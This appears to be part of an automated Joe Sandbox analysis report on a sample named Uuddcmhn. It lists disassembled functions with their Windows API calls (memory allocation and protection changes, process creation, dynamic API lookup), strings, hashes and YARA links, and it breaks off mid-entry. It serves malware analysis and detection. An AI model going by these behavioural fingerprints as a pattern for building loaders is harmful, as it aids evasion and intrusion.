                                                                • Source File: 0000000C.00000002.314991593.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02881000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_2881000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                • String ID:
                                                                • API String ID: 1694776339-0
                                                                • Opcode ID: e1a8d0addf3d4e3614e106b1059d60bb0b8ae294f13bb5eadb4e98f1051c5df5
                                                                • Instruction ID: 77902cd8d35bfbf8ac8653ebb81d28e9a92ab169612e4dba756018c52d5fd130
                                                                • Opcode Fuzzy Hash: e1a8d0addf3d4e3614e106b1059d60bb0b8ae294f13bb5eadb4e98f1051c5df5
                                                                • Instruction Fuzzy Hash: 5941A33C600754AAE730BF28C909B7375E5EF01F59F208A99E1AAC65D4DBA1A4458B42
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0288255E Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 188COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • An unexpected memory leak has occurred. , xrefs: 028826C0
                                                                • Unexpected Memory Leak, xrefs: 028828F0
                                                                • The sizes of unexpected leaked medium and large blocks are: , xrefs: 02882879
                                                                • 7, xrefs: 028826D1
                                                                • bytes: , xrefs: 0288278D
                                                                • , xrefs: 02882844
                                                                • The unexpected small block leaks are:, xrefs: 02882737
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.314991593.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02881000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_2881000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
                                                                • API String ID: 0-2723507874
                                                                • Opcode ID: ec112c4e46db5c626c6b9d34f9051d9f3fb1d6a95be675a3b80667175047dd3f
                                                                • Instruction ID: c9e8668a0a0e1e842cd64b12ab92891048c7d595873706eba5ad89dd89b7a83e
                                                                • Opcode Fuzzy Hash: ec112c4e46db5c626c6b9d34f9051d9f3fb1d6a95be675a3b80667175047dd3f
                                                                • Instruction Fuzzy Hash: 1771B33CA042E88FDF21BA2CC884BD8B6E5EB09714F1041E5D94DDB24ADB7549C5CF52
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 02885B48 Relevance: 13.6, APIs: 6, Strings: 3, Instructions: 139stringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • lstrcpyn.KERNEL32(?,?,?), ref: 02885BAC
                                                                • lstrcpyn.KERNEL32(?,?,0000005C,kernel32.dll), ref: 02885C10
                                                                • lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll), ref: 02885C46
                                                                • lstrcpyn.KERNEL32(0000005D,?,00000104), ref: 02885CAB
                                                                • lstrlen.KERNEL32(?,0000005D,?,00000104), ref: 02885CB7
                                                                • lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104), ref: 02885CD9
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.314991593.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02881000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_2881000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID: lstrcpyn$lstrlen
                                                                • String ID: GetLongPathNameA$\$kernel32.dll
                                                                • API String ID: 4046762626-1565342463
                                                                • Opcode ID: 77456efaa7ac798bdeebecec7f480bfbefeea16791a1492b19cf8061a5c2e765
                                                                • Instruction ID: fc5d6e6d9049887345d194fbb32a24204153e4bdbb7524a71b98f30756ee336e
                                                                • Opcode Fuzzy Hash: 77456efaa7ac798bdeebecec7f480bfbefeea16791a1492b19cf8061a5c2e765
                                                                • Instruction Fuzzy Hash: 2A416EBDD00218ABDB20EEE8CC88ADEB7BEAF08340F5505A5A548E7201DB74DF418F51
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0288BF84 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201threadCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetThreadLocale.KERNEL32(00000000,0288C24F,?,?,00000000,00000000), ref: 0288BFBA
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.314991593.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02881000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_2881000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID: LocaleThread
                                                                • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                • API String ID: 635194068-2493093252
                                                                • Opcode ID: 6f11661f36aeb3f655790cabbc76a61e7fc36c131609bfd3c7d44103bc98f34d
                                                                • Instruction ID: b5aac2383b39c45167ec7c812ed10dacc42df05803ba215063f6acf6c8675f64
                                                                • Opcode Fuzzy Hash: 6f11661f36aeb3f655790cabbc76a61e7fc36c131609bfd3c7d44103bc98f34d
                                                                • Instruction Fuzzy Hash: DA61423D7402499BDB04FBE8DC40A9F77B7DB98700F109477E201EB68ADA74D9099B62
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0288E5CC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 139COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0288E665
                                                                • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0288E681
                                                                • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0288E6BA
                                                                • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0288E737
                                                                • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 0288E750
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.314991593.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02881000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_2881000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID: ArraySafe$BoundIndex$Create
                                                                • String ID:
                                                                • API String ID: 3038511665-3916222277
                                                                • Opcode ID: d94f510cd20c3572f14f1eea84ef244383f3df022967f07e0074afa02e153631
                                                                • Instruction ID: a8cb644166297a1ec9de8529553bad9bc04a42141db80e3b067f70cd81f55be2
                                                                • Opcode Fuzzy Hash: d94f510cd20c3572f14f1eea84ef244383f3df022967f07e0074afa02e153631
                                                                • Instruction Fuzzy Hash: 2C51C8BD90062D9BCB26EB68C884BD9B3BDAF48304F0441D5F609E7251D770AF848F66
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0288B0D0 Relevance: 10.6, APIs: 7, Instructions: 56filewindowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 0288AF48: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0288AF65
                                                                  • Part of subcall function 0288AF48: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0288AF89
                                                                  • Part of subcall function 0288AF48: GetModuleFileNameA.KERNEL32(028DC7F0,?,00000105,?,?,00000105), ref: 0288AFA4
                                                                  • Part of subcall function 0288AF48: LoadStringA.USER32(00000000,02886B34,?,00000100), ref: 0288B03A
                                                                • CharToOemA.USER32(?,?), ref: 0288B107
                                                                • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 0288B124
                                                                • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0288B12A
                                                                • GetStdHandle.KERNEL32(000000F4,0288B194,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0288B13F
                                                                • WriteFile.KERNEL32(00000000,000000F4,0288B194,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0288B145
                                                                • LoadStringA.USER32(00000000,02886AAC,?,00000040), ref: 0288B167
                                                                • MessageBoxA.USER32(00000000,?,?,00002010), ref: 0288B17D
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.314991593.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02881000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_2881000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                                • String ID:
                                                                • API String ID: 185507032-0
                                                                • Opcode ID: 5c2638cf5a3f65236a2b2166f5073a63de6f1feb88522207cd767588b5c0dd11
                                                                • Instruction ID: 66c83f9fcc5fc97510391f74d2eae1cb3fceb6c342112bb1405c750601907ed8
                                                                • Opcode Fuzzy Hash: 5c2638cf5a3f65236a2b2166f5073a63de6f1feb88522207cd767588b5c0dd11
                                                                • Instruction Fuzzy Hash: 87117CBE584314BAD200F7A8CC81F9F77EDAB45700F804916B344EA1E1EB74E9588B67
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 02884720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38filewindowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,028847E7,?,?,?,00000000,02884892,028866D4,00000067,0288678B,0289D7B0), ref: 02884759
                                                                • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,028847E7,?,?,?,00000000,02884892,028866D4,00000067,0288678B), ref: 0288475F
                                                                • GetStdHandle.KERNEL32(000000F5,028847A8,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,028847E7), ref: 02884774
                                                                • WriteFile.KERNEL32(00000000,000000F5,028847A8,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,028847E7), ref: 0288477A
                                                                • MessageBoxA.USER32(00000000,Runtime error at 00000000,0289D778,00000000), ref: 02884798
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.314991593.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02881000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_2881000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID: FileHandleWrite$Message
                                                                • String ID: Runtime error at 00000000
                                                                • API String ID: 1570097196-1393363852
                                                                • Opcode ID: 28a8ea8dd01ea93bd1f9ee92e2545c64478007557ca7459829275df4670d32d7
                                                                • Instruction ID: 99bdf777c4b266b0e58ae524378c84fda9d27f89f3f4efc82af9d415238afbe9
                                                                • Opcode Fuzzy Hash: 28a8ea8dd01ea93bd1f9ee92e2545c64478007557ca7459829275df4670d32d7
                                                                • Instruction Fuzzy Hash: 38F0B4BEAC530978FB20B3A59D89F79236C5741F11F744B19F268E90C0CBE954C9872A
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 02895722 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 98processsynchronizationCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,00000044,?), ref: 0289583C
                                                                • WaitForSingleObject.KERNEL32(?,000000FF,00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,00000044,?), ref: 02895853
                                                                • CloseHandle.KERNEL32(?,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,00000044,?), ref: 0289585C
                                                                • CloseHandle.KERNEL32(?,?,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,00000044,?), ref: 02895865
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.314991593.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02881000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_2881000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID: CloseHandle$CreateObjectProcessSingleWait
                                                                • String ID: D
                                                                • API String ID: 2059082233-2746444292
                                                                • Opcode ID: d7d35fc8fd88bc68504733ef8f3c27e5ac537abaaf402ccd0f8aacdcb924dd9b
                                                                • Instruction ID: 7c0e32ce7fcfb3e792c3c107acb8bcb5c2d27e5b2595c07c92fe7bd5881ab94a
                                                                • Opcode Fuzzy Hash: d7d35fc8fd88bc68504733ef8f3c27e5ac537abaaf402ccd0f8aacdcb924dd9b
                                                                • Instruction Fuzzy Hash: 49316E7DA002199BEB21EF98CC81BDFB3B9EB49310F5041A5A508FB240DA75AE85CF51
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 02895724 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 97processsynchronizationCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,00000044,?), ref: 0289583C
                                                                • WaitForSingleObject.KERNEL32(?,000000FF,00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,00000044,?), ref: 02895853
                                                                • CloseHandle.KERNEL32(?,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,00000044,?), ref: 0289585C
                                                                • CloseHandle.KERNEL32(?,?,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,00000044,?), ref: 02895865
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.314991593.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02881000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_2881000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID: CloseHandle$CreateObjectProcessSingleWait
                                                                • String ID: D
                                                                • API String ID: 2059082233-2746444292
                                                                • Opcode ID: 5b851c67346e9432f805c9accc8114bc1923cbad45715e8af586b50fe871c641
                                                                • Instruction ID: d3704b091d04fbb5cf92a52698b53665023c87e447b7957de22da3bcc36f4641
                                                                • Opcode Fuzzy Hash: 5b851c67346e9432f805c9accc8114bc1923cbad45715e8af586b50fe871c641
                                                                • Instruction Fuzzy Hash: 21316E7DA002199BDB21EF98CC81BDFB3B9EB49310F5041A5A508FB240DA75AE85CF51
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 02894F34 Relevance: 7.7, APIs: 5, Instructions: 188memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 02894F87
                                                                • VirtualAlloc.KERNEL32(?,?,00001000,00000004,00000000,?,00002000,00000001), ref: 02894FAD
                                                                • VirtualProtect.KERNEL32(?,?,00000002,?,?,?,00001000,00000004,00000000,?,00002000,00000001), ref: 02894FD7
                                                                • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,00000002,?,?,?,00001000,00000004,00000000,?,00002000,00000001), ref: 0289502F
                                                                • VirtualProtect.KERNEL32(?,?,00000000,?,00000001), ref: 028950E6
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.314991593.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02881000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_2881000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID: Virtual$Alloc$Protect
                                                                • String ID:
                                                                • API String ID: 655996629-0
                                                                • Opcode ID: e6d56b9caabff5c3e9a515fc4b23c7526a19e0ba828a407d8b1f62cb7e884a18
                                                                • Instruction ID: c27b68956f31fd561b53be628a5f6363804f2c3df574b3b24be23faead5bfb32
                                                                • Opcode Fuzzy Hash: e6d56b9caabff5c3e9a515fc4b23c7526a19e0ba828a407d8b1f62cb7e884a18
                                                                • Instruction Fuzzy Hash: CB71F2B9A002099FDB11DFA8C880EAEB7F9FF48300F694465E904EB255D734EA41CF61
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0288AD0C Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148threadCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetThreadLocale.KERNEL32(?,00000000,0288AEDC,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0288AD3B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.314991593.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02881000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_2881000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID: LocaleThread
                                                                • String ID: eeee$ggg$yyyy
                                                                • API String ID: 635194068-1253427255
                                                                • Opcode ID: e2ebda22cb7350609b3f548661088ef55c576c4c67a4e5d40e8a47499f13d895
                                                                • Instruction ID: 21b90f4cfccc8953af0f96f1f17a5b83e19a5d8784b598f32894f3b6de13319f
                                                                • Opcode Fuzzy Hash: e2ebda22cb7350609b3f548661088ef55c576c4c67a4e5d40e8a47499f13d895
                                                                • Instruction Fuzzy Hash: B741F23F30410A4BC719BABC88902BEB3EBDB85304B544867D9D1D77C4EA34ED06CA66
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0288C608 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,?,0289C10B,00000000,0289C11E), ref: 0288C60E
                                                                • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 0288C61F
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.314991593.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02881000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_2881000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID: AddressHandleModuleProc
                                                                • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                • API String ID: 1646373207-3712701948
                                                                • Opcode ID: b1092b43f2e2ff02ffa91a02a6a3f397958ae29884d8c5bb425ae81a613f2e0d
                                                                • Instruction ID: f5838bec9f2ac638a6043990f8fc065e9b3c4c0995388538af9c36cb4da05b99
                                                                • Opcode Fuzzy Hash: b1092b43f2e2ff02ffa91a02a6a3f397958ae29884d8c5bb425ae81a613f2e0d
                                                                • Instruction Fuzzy Hash: AED05EACA903959AE704FBA86980A1523D8A705600F442D7EA105E9287D7A484148B29
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 028943F8 Relevance: 6.2, APIs: 4, Instructions: 171memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,00002000,00000001,00000000,028945E6,?,028CD33C,?,028DD338), ref: 02894466
                                                                • VirtualProtect.KERNEL32(?,?,00000002,?,?,?,00001000,00000004,?,?,00002000,00000001,00000000,028945E6,?,028CD33C), ref: 02894490
                                                                • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,00000002,?,?,?,00001000,00000004,?,?,00002000,00000001), ref: 028944E8
                                                                • VirtualProtect.KERNEL32(?,?,00000000,?,028DD338), ref: 028945AE
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.314991593.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02881000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_2881000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID: Virtual$AllocProtect
                                                                • String ID:
                                                                • API String ID: 2447062925-0
                                                                • Opcode ID: b51fe17431390e2c8f11561e107352157ba70445c5ead302b3eefb6469355e38
                                                                • Instruction ID: ed18a56e15f0e1a05fca582505b9078e50926a38f2d31f6bbd8c34ee39ccce42
                                                                • Opcode Fuzzy Hash: b51fe17431390e2c8f11561e107352157ba70445c5ead302b3eefb6469355e38
                                                                • Instruction Fuzzy Hash: E071CF79A00208AFDB10DFA9D980AAEB7F9FF48310F1584A5E905EB255D634EE058F60
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 02894F2C Relevance: 6.2, APIs: 4, Instructions: 156memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • VirtualAlloc.KERNEL32(?,?,00001000,00000004,00000000,?,00002000,00000001), ref: 02894FAD
                                                                • VirtualProtect.KERNEL32(?,?,00000002,?,?,?,00001000,00000004,00000000,?,00002000,00000001), ref: 02894FD7
                                                                • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,00000002,?,?,?,00001000,00000004,00000000,?,00002000,00000001), ref: 0289502F
                                                                • VirtualProtect.KERNEL32(?,?,00000000,?,00000001), ref: 028950E6
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.314991593.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02881000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_2881000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID: Virtual$AllocProtect
                                                                • String ID:
                                                                • API String ID: 2447062925-0
                                                                • Opcode ID: e5661ab19f4da8cf293cb5a14b945bbc5c43641277d4f4c909a762e5071c5ed4
                                                                • Instruction ID: 83e193e4a2f8cd88c528085b63132206345b52cfc08b2ad0bd420aeddbc2e6e1
                                                                • Opcode Fuzzy Hash: e5661ab19f4da8cf293cb5a14b945bbc5c43641277d4f4c909a762e5071c5ed4
                                                                • Instruction Fuzzy Hash: 5B51E279A0020A9FDF11DFA8C880EAEB7F9FF48300F694455E945EB255D734EA41CB61
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 028943ED Relevance: 6.1, APIs: 4, Instructions: 141memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,00002000,00000001,00000000,028945E6,?,028CD33C,?,028DD338), ref: 02894466
                                                                • VirtualProtect.KERNEL32(?,?,00000002,?,?,?,00001000,00000004,?,?,00002000,00000001,00000000,028945E6,?,028CD33C), ref: 02894490
                                                                • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,00000002,?,?,?,00001000,00000004,?,?,00002000,00000001), ref: 028944E8
                                                                • VirtualProtect.KERNEL32(?,?,00000000,?,028DD338), ref: 028945AE
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.314991593.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02881000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_2881000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID: Virtual$AllocProtect
                                                                • String ID:
                                                                • API String ID: 2447062925-0
                                                                • Opcode ID: d342c60d690b39be388345ddf9b7ff2342bc5a903c3daba1f04f948a3a021244
                                                                • Instruction ID: 24d0c216b6354ab336e69ef88ca7f73e8da452591c6f1f9ac43ed850387807b8
                                                                • Opcode Fuzzy Hash: d342c60d690b39be388345ddf9b7ff2342bc5a903c3daba1f04f948a3a021244
                                                                • Instruction Fuzzy Hash: 0F51C279A00208AFCB10EFA8D980AAEB7F5FF48304F1584A5E905EB255D730EA05CF51
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0288E32C Relevance: 6.1, APIs: 4, Instructions: 115COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0288E3DB
                                                                • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0288E3F7
                                                                • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0288E46E
                                                                • VariantClear.OLEAUT32(?), ref: 0288E497
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.314991593.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02881000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_2881000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID: ArraySafe$Bound$ClearIndexVariant
                                                                • String ID:
                                                                • API String ID: 920484758-0
                                                                • Opcode ID: 88686fe7731b7c03f03ace40aaed8d38b50d90d6747c96ad40a312f6e176089f
                                                                • Instruction ID: a5931e8466583ca85d133c1e3d1b4ca188bd4bf4918b55000a16042a388ea9a9
                                                                • Opcode Fuzzy Hash: 88686fe7731b7c03f03ace40aaed8d38b50d90d6747c96ad40a312f6e176089f
                                                                • Instruction Fuzzy Hash: 844106BDA0162D9BCB61EB58C894BC9B3BDAB48314F0041D5F64DE7251DB34AF808F66
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0288AF48 Relevance: 6.1, APIs: 4, Instructions: 102COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0288AF65
                                                                • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0288AF89
                                                                • GetModuleFileNameA.KERNEL32(028DC7F0,?,00000105,?,?,00000105), ref: 0288AFA4
                                                                • LoadStringA.USER32(00000000,02886B34,?,00000100), ref: 0288B03A
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.314991593.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02881000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_2881000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID: FileModuleName$LoadQueryStringVirtual
                                                                • String ID:
                                                                • API String ID: 3990497365-0
                                                                • Opcode ID: 365bec6633a5b4443580f69d28af6cc49264f6e3243e89d6a134bfdf7381b41b
                                                                • Instruction ID: 42227fe4cd582ba39796295298cfaf5adb9153ddbd7ac35f6a3af3085de636b4
                                                                • Opcode Fuzzy Hash: 365bec6633a5b4443580f69d28af6cc49264f6e3243e89d6a134bfdf7381b41b
                                                                • Instruction Fuzzy Hash: 2F411A7DA4025C9BDB21EB68CC84BDAB7BDAF48304F4440E6E508E7241E775AF888F55
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0288AF46 Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0288AF65
                                                                • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0288AF89
                                                                • GetModuleFileNameA.KERNEL32(028DC7F0,?,00000105,?,?,00000105), ref: 0288AFA4
                                                                • LoadStringA.USER32(00000000,02886B34,?,00000100), ref: 0288B03A
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.314991593.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02881000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_2881000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID: FileModuleName$LoadQueryStringVirtual
                                                                • String ID:
                                                                • API String ID: 3990497365-0
                                                                • Opcode ID: 9a15f3043f97d3eebee5a202bdca4880df4d098eb99b016066f30dcd15576571
                                                                • Instruction ID: 6062773e45dffc275bbf08a8b5ac6c7197ebea5e83572db07f5955cab03a05d3
                                                                • Opcode Fuzzy Hash: 9a15f3043f97d3eebee5a202bdca4880df4d098eb99b016066f30dcd15576571
                                                                • Instruction Fuzzy Hash: 4C412E7DA4025C9BDB21EB68CC84BDAB7BDAF48304F4440E6E508E7241E775AF888F55
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0288AC5C Relevance: 6.0, APIs: 4, Instructions: 50threadCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetThreadLocale.KERNEL32(?,00000000,0288ACF3,?,?,00000000), ref: 0288AC74
                                                                • GetThreadLocale.KERNEL32(00000000,00000004,00000000,0288ACF3,?,?,00000000), ref: 0288ACA4
                                                                • GetThreadLocale.KERNEL32(00000000,00000003,Function_00009BA8,00000000,00000000,00000004,00000000,0288ACF3,?,?,00000000), ref: 0288ACCD
                                                                • EnumCalendarInfoA.KERNEL32(Function_00009BE4,00000000,00000000,00000003), ref: 0288ACD8
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.314991593.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02881000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_2881000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID: LocaleThread$CalendarEnumInfo
                                                                • String ID:
                                                                • API String ID: 1139405593-0
                                                                • Opcode ID: a2d0b5e30305aff0a3b6c82aaf1b90814127ff1218c5b53dd4d33ae562009a64
                                                                • Instruction ID: 49262260bed7f3f7dd1b09f9c8c65a552177cda727ce209ff22c9e6cdcf80579
                                                                • Opcode Fuzzy Hash: a2d0b5e30305aff0a3b6c82aaf1b90814127ff1218c5b53dd4d33ae562009a64
                                                                • Instruction Fuzzy Hash: 41012B3D6002086FF309B778DD01F5F765EDF45720F500162F915D67C0FAA8AE014966
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 028945F8 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 42stringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • lstrcmpi.KERNEL32(?,iexpress.exe), ref: 0289462D
